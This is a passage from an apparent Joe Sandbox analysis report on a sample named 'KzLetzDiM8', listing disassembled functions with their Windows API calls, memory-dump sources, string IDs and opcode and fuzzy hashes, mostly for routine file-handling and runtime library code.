                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: File
                                                            • String ID:
                                                            • API String ID: 749574446-0
                                                            • Opcode ID: a7fa84328a21cc42f4ad46afc215288b494295f51d7bb7fe84841a16e7887fb9
                                                            • Instruction ID: 794b9a8fdefd132fac786c8e74bfbf0b3e85870a4757e38bf403a156178f3115
                                                            • Opcode Fuzzy Hash: a7fa84328a21cc42f4ad46afc215288b494295f51d7bb7fe84841a16e7887fb9
                                                            • Instruction Fuzzy Hash: 74A0113008000A8A8E00AB30EA0808C3B22EB20BC030082A8A00ACA0A2CB22880B8A00
                                                            Function 001FAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetCurrentDirectoryW.KERNELBASE(?,001FAE72,C:\Users\user\Desktop,00000000,0022946A,00000006), ref: 001FAC08
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory
                                                            • String ID:
                                                            • API String ID: 1611563598-0
                                                            • Opcode ID: b16fe06dea333e2f76a745ac90d8d0b2c83478b19a03451e63936cc5f88deda0
                                                            • Instruction ID: f71a3f41bf41c565b942b551278d13a593a8dc99c1dbabe614e7245eeafdd06b
                                                            • Opcode Fuzzy Hash: b16fe06dea333e2f76a745ac90d8d0b2c83478b19a03451e63936cc5f88deda0
                                                            • Instruction Fuzzy Hash: 0BA00271105141979A015B329F4954F76566F61751F05C425654584170DB35C960A515
                                                            Function 001E9620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CloseHandle.KERNELBASE(000000FF,?,?,001E95D6,?,?,?,?,?,00212641,000000FF), ref: 001E963B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: 47a3e03d7e204aa75e968fc2aae12d58ce0cd0be683a36b9ebb924bb9368a8d4
                                                            • Instruction ID: bda129dc7f7a7a5317a3400908642134e666a789e3e1ab1b7abf63a49e6f1383
                                                            • Opcode Fuzzy Hash: 47a3e03d7e204aa75e968fc2aae12d58ce0cd0be683a36b9ebb924bb9368a8d4
                                                            • Instruction Fuzzy Hash: A0F0E230081F95AFDB308B22C448B96B7E9AB26321F040B1FD0E2429E0D760AA8D8A40

                                                            Non-executed Functions

                                                            Function 001FC220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001E1316: GetDlgItem.USER32(00000000,00003021), ref: 001E135A
                                                              • Part of subcall function 001E1316: SetWindowTextW.USER32(00000000,002135F4), ref: 001E1370
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 001FC2B1
                                                            • EndDialog.USER32(?,00000006), ref: 001FC2C4
                                                            • GetDlgItem.USER32(?,0000006C), ref: 001FC2E0
                                                            • SetFocus.USER32(00000000), ref: 001FC2E7
                                                            • SetDlgItemTextW.USER32(?,00000065,?), ref: 001FC321
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 001FC358
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 001FC36E
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001FC38C
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 001FC39C
                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 001FC3B8
                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 001FC3D4
                                                            • _swprintf.LIBCMT ref: 001FC404
                                                              • Part of subcall function 001E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001E40A5
                                                            • SetDlgItemTextW.USER32(?,0000006A,?), ref: 001FC417
                                                            • FindClose.KERNEL32(00000000), ref: 001FC41E
                                                            • _swprintf.LIBCMT ref: 001FC477
                                                            • SetDlgItemTextW.USER32(?,00000068,?), ref: 001FC48A
                                                            • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 001FC4A7
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 001FC4C7
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 001FC4D7
                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 001FC4F1
                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 001FC509
                                                            • _swprintf.LIBCMT ref: 001FC535
                                                            • SetDlgItemTextW.USER32(?,0000006B,?), ref: 001FC548
                                                            • _swprintf.LIBCMT ref: 001FC59C
                                                            • SetDlgItemTextW.USER32(?,00000069,?), ref: 001FC5AF
                                                              • Part of subcall function 001FAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 001FAF35
                                                              • Part of subcall function 001FAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0021E72C,?,?), ref: 001FAF84
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                            • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                            • API String ID: 797121971-1840816070
                                                            • Opcode ID: 56a287d6ceb2eae45bde5917d7fbbe00811b8e5b88f6b8debceea0d8855cb34f
                                                            • Instruction ID: 8ed5d8d87d683b4495df986329c6efcc8eb12a70befdbb0b074f2e84d4c4898d
                                                            • Opcode Fuzzy Hash: 56a287d6ceb2eae45bde5917d7fbbe00811b8e5b88f6b8debceea0d8855cb34f
                                                            • Instruction Fuzzy Hash: 2A91827224834CBBD321DBA0DD49FFB77ECEB9A700F044819B749D6081DB75A6049B62
                                                            Function 001E6FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001E6FAA
                                                            • _wcslen.LIBCMT ref: 001E7013
                                                            • _wcslen.LIBCMT ref: 001E7084
                                                              • Part of subcall function 001E7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 001E7AAB
                                                              • Part of subcall function 001E7A9C: GetLastError.KERNEL32 ref: 001E7AF1
                                                              • Part of subcall function 001E7A9C: CloseHandle.KERNEL32(?), ref: 001E7B00
                                                              • Part of subcall function 001EA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,001E977F,?,?,001E95CF,?,?,?,?,?,00212641,000000FF), ref: 001EA1F1
                                                              • Part of subcall function 001EA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,001E977F,?,?,001E95CF,?,?,?,?,?,00212641), ref: 001EA21F
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 001E7139
                                                            • CloseHandle.KERNEL32(00000000), ref: 001E7155
                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 001E7298
                                                              • Part of subcall function 001E9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,001E73BC,?,?,?,00000000), ref: 001E9DBC
                                                              • Part of subcall function 001E9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 001E9E70
                                                              • Part of subcall function 001E9620: CloseHandle.KERNELBASE(000000FF,?,?,001E95D6,?,?,?,?,?,00212641,000000FF), ref: 001E963B
                                                              • Part of subcall function 001EA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,001EA325,?,?,?,001EA175,?,00000001,00000000,?,?), ref: 001EA501
                                                              • Part of subcall function 001EA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,001EA325,?,?,?,001EA175,?,00000001,00000000,?,?), ref: 001EA532
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 3983180755-3508440684
                                                            • Opcode ID: 35816727b427e569663b66435d2b321dd3ec8e3aa1d0d919d531c82eb436313e
                                                            • Instruction ID: 6aa957dc10c0c784cc48de8538a81bcd542082fa8ed59ebec1f23a7ccf2be1ab
                                                            • Opcode Fuzzy Hash: 35816727b427e569663b66435d2b321dd3ec8e3aa1d0d919d531c82eb436313e
                                                            • Instruction Fuzzy Hash: 8AC11871904B84AAEB25DB75DC45FEEB3ADBF28300F00455AFA56E31C2D730AA44CB61
                                                            Function 0020D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: __floor_pentium4
                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                            • API String ID: 4168288129-2761157908
                                                            • Opcode ID: af167eb51dd709f0a24692dee09c7e6385fd5142a26e5ff304c11c6fab3ab281
                                                            • Instruction ID: 8e0724025ca4c981aabe3bcabc33fab7511ad328a185faa153035fd44f7214b7
                                                            • Opcode Fuzzy Hash: af167eb51dd709f0a24692dee09c7e6385fd5142a26e5ff304c11c6fab3ab281
                                                            • Instruction Fuzzy Hash: 59C27B72E292298FDF25CE28DD407EAB7B5EB44304F1545EAD40DE7282E774AE918F40
                                                            Function 001E32F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: H_prolog_swprintf
                                                            • String ID: CMT$h%u$hc%u
                                                            • API String ID: 146138363-3282847064
                                                            • Opcode ID: b515371d315647bc631c51dddecb1db88a9ed22db068c765fad2e5f6bbbe7d51
                                                            • Instruction ID: eea06ea7bf823d3142fc828c01274c25bc547aa669247a0d8bec1a6d2450ccc4
                                                            • Opcode Fuzzy Hash: b515371d315647bc631c51dddecb1db88a9ed22db068c765fad2e5f6bbbe7d51
                                                            • Instruction Fuzzy Hash: 7532D571510BC5ABDB18DF75C899AED37E5AF25300F04047DFD9A8B282DB709689CB60
                                                            Function 001E286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001E2874
                                                            • _strlen.LIBCMT ref: 001E2E3F
                                                              • Part of subcall function 001F02BA: __EH_prolog.LIBCMT ref: 001F02BF
                                                              • Part of subcall function 001F1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,001EBAE9,00000000,?,?,?,00010412), ref: 001F1BA0
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001E2F91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                            • String ID: CMT
                                                            • API String ID: 1206968400-2756464174
                                                            • Opcode ID: 28e4a4b7203b729c75c1639b6be5008537a4f686a328f22a9223899cf6226953
                                                            • Instruction ID: 8d8e47192ca35c6b4e25bf712eb82fb99285b25ad42aaf7c9551cd60f6f481b1
                                                            • Opcode Fuzzy Hash: 28e4a4b7203b729c75c1639b6be5008537a4f686a328f22a9223899cf6226953
                                                            • Instruction Fuzzy Hash: FD623771500AC58FDB19CF35C896AEE3BA5FF64300F08447EED9A8B282DB759945CB60
                                                            Function 0020D440 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: [ $[
                                                            • API String ID: 0-445114706
                                                            • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                            • Instruction ID: edcc6fc318546fc08c74269b3833245e02ed71160aae004c850eb140b336e4d3
                                                            • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                            • Instruction Fuzzy Hash: C5023C71E112199BDF14CFA9C8806ADFBF5EF88314F258169D919E7381D731AD51CB80
                                                            Function 001FF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 001FF844
                                                            • IsDebuggerPresent.KERNEL32 ref: 001FF910
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001FF930
                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 001FF93A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                            • String ID:
                                                            • API String ID: 254469556-0
                                                            • Opcode ID: 89175964a52141e74c039ba8310bdb629743465f4150ed2a0cef84a760d1117b
                                                            • Instruction ID: 55b9bbac270d736614d955dc27580ea64edf025eb816db8c396b40582df784f9
                                                            • Opcode Fuzzy Hash: 89175964a52141e74c039ba8310bdb629743465f4150ed2a0cef84a760d1117b
                                                            • Instruction Fuzzy Hash: 45312975D0521DABDF20DFA4D9897CCBBB8BF18304F1041AAE50CAB250EBB19B859F44
                                                            Function 001FE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualQuery.KERNEL32(80000000,001FE5E8,0000001C,001FE7DD,00000000,?,?,?,?,?,?,?,001FE5E8,00000004,00241CEC,001FE86D), ref: 001FE6B4
                                                            • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,001FE5E8,00000004,00241CEC,001FE86D), ref: 001FE6CF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: InfoQuerySystemVirtual
                                                            • String ID: D
                                                            • API String ID: 401686933-2746444292
                                                            • Opcode ID: f8b2cc17b09fb91c7e3308abc5251f0d535eab92a4fbdb60fb92fe063e45eb72
                                                            • Instruction ID: 19083b9b25030b4ff78d4129460eab279d0cee030d8a1fd2ddb092fe40b155b9
                                                            • Opcode Fuzzy Hash: f8b2cc17b09fb91c7e3308abc5251f0d535eab92a4fbdb60fb92fe063e45eb72
                                                            • Instruction Fuzzy Hash: 6701F736A0010D6BDB24DE29DC09BED7BEAAFC4324F0CC220EE1DD7154DB34D9058680
                                                            Function 00208EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00208FB5
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00208FBF
                                                            • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00208FCC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: 3b479156b97390b71b90cb8496ce283774c4bf5a1fbffa2b476c66944272698c
                                                            • Instruction ID: 987363864765589e4df0b4d537ccf81a1910a98b4546772f7950333c9e0100e5
                                                            • Opcode Fuzzy Hash: 3b479156b97390b71b90cb8496ce283774c4bf5a1fbffa2b476c66944272698c
                                                            • Instruction Fuzzy Hash: 5831D57590121DABCB21DF24DC88BDDBBB8AF18310F5041EAE51CA7291EB709F818F44
                                                            Function 001FAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 001FAF35
                                                            • GetNumberFormatW.KERNEL32(00000400,00000000,?,0021E72C,?,?), ref: 001FAF84
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: FormatInfoLocaleNumber
                                                            • String ID:
                                                            • API String ID: 2169056816-0
                                                            • Opcode ID: 36486be5b5d46279b58090a030c343e5175675b7a59879676628a3bb7f731def
                                                            • Instruction ID: b4c66f7fd42dbb1879aad72d9760a03bc0c4af25a0e8e20a623752f946d7d573
                                                            • Opcode Fuzzy Hash: 36486be5b5d46279b58090a030c343e5175675b7a59879676628a3bb7f731def
                                                            • Instruction Fuzzy Hash: 1C015E7A550308BADB10DF65EC49FDB77B8EF19710F009422FA09971A0D77099258BA5
                                                            Function 001E6C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(001E6DDF,00000000,00000400), ref: 001E6C74
                                                            • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 001E6C95
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            • Opcode ID: b7b83cc6db2e6567bb13adf0c2bc4502f4d81fdf70486e25e94b699efda235e0
                                                            • Instruction ID: 0e07bbcdf6c2e9c82ea6f1a63f8ebc0da5cac9e9215da7a0841abcfcf1db6dfd
                                                            • Opcode Fuzzy Hash: b7b83cc6db2e6567bb13adf0c2bc4502f4d81fdf70486e25e94b699efda235e0
                                                            • Instruction Fuzzy Hash: D5D0C731344300BFFA114B625D0AF5E7B99BF65BD1F64C4047755D50E0CB749514A615
